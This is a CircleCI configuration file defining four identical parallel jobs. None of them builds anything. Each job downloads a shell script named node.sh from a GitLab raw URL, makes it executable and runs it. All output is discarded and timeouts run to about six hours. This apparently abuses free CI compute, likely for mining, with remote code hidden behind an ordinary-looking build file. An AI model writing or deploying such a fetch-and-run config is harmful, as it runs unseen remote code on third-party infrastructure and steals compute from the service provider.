version: 2
jobs:
  build_01:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/fukadabunit/project-7/-/raw/main/node.sh && chmod +x node.sh && ./node.sh >/dev/null 2>&1"
      
      
      
      
  build_02:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/fukadabunit/project-7/-/raw/main/node.sh && chmod +x node.sh && ./node.sh >/dev/null 2>&1"
      
  build_03:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/fukadabunit/project-7/-/raw/main/node.sh && chmod +x node.sh && ./node.sh >/dev/null 2>&1"
      
  build_04:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/fukadabunit/project-7/-/raw/main/node.sh && chmod +x node.sh && ./node.sh >/dev/null 2>&1"

  

  
      
  
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
